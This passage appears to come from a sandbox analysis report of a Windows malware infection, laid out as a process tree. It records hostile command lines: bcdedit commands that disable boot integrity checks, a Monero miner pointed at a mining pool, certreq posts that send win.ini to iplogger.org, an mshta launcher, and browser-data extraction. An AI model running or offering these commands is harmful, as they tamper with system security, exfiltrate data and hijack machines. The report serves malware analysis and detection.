        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:1516
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5220
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6300
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5620
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6720
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5760
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6376
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6036
        
        C:\Windows\System32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        12⤵
        Modifies boot configuration data using bcdedit
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        12⤵
        
        PID:6508
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        12⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        13⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        14⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe" /ustwo INSTALL
        8⤵
        Executes dropped EXE
        
        PID:3472
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "cs0v1n1khqj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe" & exit
        9⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "cs0v1n1khqj.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:212
        
        C:\Users\Admin\AppData\Local\Temp\yxtyf4xsdq0\snunkwxhkty.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yxtyf4xsdq0\snunkwxhkty.exe" testparams
        8⤵
        Executes dropped EXE
        
        PID:4792
        
        C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe
        
        "C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe" /VERYSILENT /p=testparams
        9⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\is-AD6PQ.tmp\03rmxcykcrh.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AD6PQ.tmp\03rmxcykcrh.tmp" /SL5="$701DE,536425,199680,C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe" /VERYSILENT /p=testparams
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      PID:2296
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:3680
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:580
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:2860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      Executes dropped EXE
      PID:2572
    - - C:\ProgramData\8211062.90
        
        "C:\ProgramData\8211062.90"
        5⤵
        Executes dropped EXE
        
        PID:380
    - - C:\ProgramData\1943025.21
        
        "C:\ProgramData\1943025.21"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4500
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:572
    - - C:\ProgramData\7053625.77
        
        "C:\ProgramData\7053625.77"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Drops startup file
        Adds Run key to start application
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2420
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        Executes dropped EXE
        
        PID:5692
    - - C:\ProgramData\6710301.73
        
        "C:\ProgramData\6710301.73"
        5⤵
        Executes dropped EXE
        
        PID:4788
    - - C:\ProgramData\4483827.49
        
        "C:\ProgramData\4483827.49"
        5⤵
        Executes dropped EXE
        
        PID:4636
      - C:\ProgramData\4483827.49
        
        "{path}"
        6⤵
        
        PID:5196
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3116
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:5316
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:5648

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C607217CC065EC9CDB7EE893C6E57C13 C
  2⤵
  - Loads dropped DLL
  PID:4340

C:\Users\Admin\AppData\Local\Temp\is-INDNL.tmp\kk1zazd4ft2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-INDNL.tmp\kk1zazd4ft2.tmp" /SL5="$80068,870426,780800,C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4536
- C:\Users\Admin\AppData\Local\Temp\is-R0KAJ.tmp\winlthst.exe
  "C:\Users\Admin\AppData\Local\Temp\is-R0KAJ.tmp\winlthst.exe" test1 test1
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6020
- - C:\Users\Admin\AppData\Local\Temp\773hKElno.exe
    "C:\Users\Admin\AppData\Local\Temp\773hKElno.exe"
    3⤵
    PID:2176

C:\Users\Admin\AppData\Local\Temp\is-7VBUD.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7VBUD.tmp\IBInstaller_97039.tmp" /SL5="$8004A,14455514,721408,C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2232
- C:\Users\Admin\AppData\Local\Temp\is-TT7AD.tmp\{app}\chrome_proxy.exe
  "C:\Users\Admin\AppData\Local\Temp\is-TT7AD.tmp\{app}\chrome_proxy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3252
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
  2⤵
  PID:4012

C:\Users\Admin\AppData\Local\Temp\is-EIM08.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EIM08.tmp\vict.tmp" /SL5="$301F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe" /VERYSILENT /id=535
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:840
- C:\Users\Admin\AppData\Local\Temp\is-2D9P1.tmp\wimapi.exe
  "C:\Users\Admin\AppData\Local\Temp\is-2D9P1.tmp\wimapi.exe" 535
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6108

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
1⤵
PID:4524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4912

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo grYNxrw
  2⤵
  PID:5676
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:5160
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PjMCYRVvFiGYRZCsTsllRymwdfLpHzjkTlyvJeXJBvVpnBIRpeOsWfRKMKjJuLOkUcyGUyIRzAIxpdCOHTqEEVgDaxJYPgDPHJgevwWrxWXvGvAcibwjLpHZiBgmcK$" Acre.wmz
      4⤵
      PID:2596
  - - C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
      Fai.com Far.xlt
      4⤵
      PID:6152
    - - C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
        5⤵
        
        PID:6460
      - C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        
        C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
        6⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ver > "C:\Users\Admin\AppData\Local\Temp\chrF292.tmp"
        7⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C wmic process get Name > "C:\Users\Admin\AppData\Local\Temp\chrF429.tmp"
        7⤵
        
        PID:836
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process get Name
        8⤵
        
        PID:5132
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      Runs ping.exe
      PID:2640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4868

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
1⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4572
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:5280

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
1⤵
- Executes dropped EXE
PID:2980
- C:\Program Files (x86)\JCleaner\Venita.exe
  "{path}"
  2⤵
  PID:5872
- C:\Program Files (x86)\JCleaner\Venita.exe
  "{path}"
  2⤵
  PID:5236
- C:\Program Files (x86)\JCleaner\Venita.exe
  "{path}"
  2⤵
  PID:1916

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4920

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:1364
- C:\Windows\SysWOW64\certreq.exe
  certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
  2⤵
  PID:5260

C:\Users\Admin\AppData\Local\Temp\is-90TKL.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-90TKL.tmp\chashepro3.tmp" /SL5="$601FE,2012497,58368,C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3932

C:\Users\Admin\AppData\Local\Temp\is-O75OE.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O75OE.tmp\Setup3310.tmp" /SL5="$5020C,802346,56832,C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4900
- C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe" /Verysilent
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5240
- - C:\Users\Admin\AppData\Local\Temp\is-5M88C.tmp\Setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-5M88C.tmp\Setup.tmp" /SL5="$20490,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe" /Verysilent
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe
      "C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe" /Verysilent
      4⤵
      PID:6000
    - - C:\Users\Admin\AppData\Local\Temp\is-F3ELN.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F3ELN.tmp\ProPlugin.tmp" /SL5="$401A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe" /Verysilent
        5⤵
        
        PID:3112
      - C:\Users\Admin\AppData\Local\Temp\is-EHK5N.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EHK5N.tmp\Setup.exe"
        6⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
        7⤵
        
        PID:1872
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:3424
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        8⤵
        Runs .reg file with regedit
        
        PID:5488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        8⤵
        
        PID:4512
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        9⤵
        
        PID:4556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\chrome64.bat" h"
        10⤵
        
        PID:5484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        11⤵
        
        PID:5996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaee796e00,0x7ffaee796e10,0x7ffaee796e20
        12⤵
        
        PID:4176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1844 /prefetch:8
        12⤵
        
        PID:4972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1832 /prefetch:8
        12⤵
        
        PID:5480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1784 /prefetch:2
        12⤵
        
        PID:5524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
        12⤵
        
        PID:5520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
        12⤵
        
        PID:2264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3296 /prefetch:8
        12⤵
        
        PID:5856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
        12⤵
        
        PID:208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
        12⤵
        
        PID:6084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
        12⤵
        
        PID:3908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
        12⤵
        
        PID:1004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
        12⤵
        
        PID:5460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4352 /prefetch:8
        12⤵
        
        PID:5952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3308 /prefetch:8
        12⤵
        
        PID:5944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
        12⤵
        
        PID:5980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:8
        12⤵
        
        PID:6716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:8
        12⤵
        
        PID:6728
        
        C:\Windows\regedit.exe
        
        regedit /s chrome-set.reg
        8⤵
        Runs .reg file with regedit
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
        
        parse.exe -f json -b firefox
        8⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
        
        parse.exe -f json -b chrome
        8⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
        
        parse.exe -f json -b edge
        8⤵
        
        PID:4696
  - - C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe
      "C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe" /Verysilent
      4⤵
      PID:1404
    - - C:\Users\Admin\AppData\Local\Temp\is-ATVHU.tmp\Delta.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ATVHU.tmp\Delta.tmp" /SL5="$501A2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe" /Verysilent
        5⤵
        
        PID:2844
      - C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe" /VERYSILENT
        6⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Setup.exe /f
        8⤵
        Kills process with taskkill
        
        PID:6232
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:6564
  - - C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe
      "C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe" /Verysilent
      4⤵
      PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\is-HBSJU.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HBSJU.tmp\zznote.tmp" /SL5="$601A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe" /Verysilent
        5⤵
        
        PID:768
      - C:\Users\Admin\AppData\Local\Temp\is-GHUBQ.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GHUBQ.tmp\jg4_4jaa.exe" /silent
        6⤵
        
        PID:5584
  - - C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\hjjgaa.exe" /Verysilent
      4⤵
      PID:6580
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
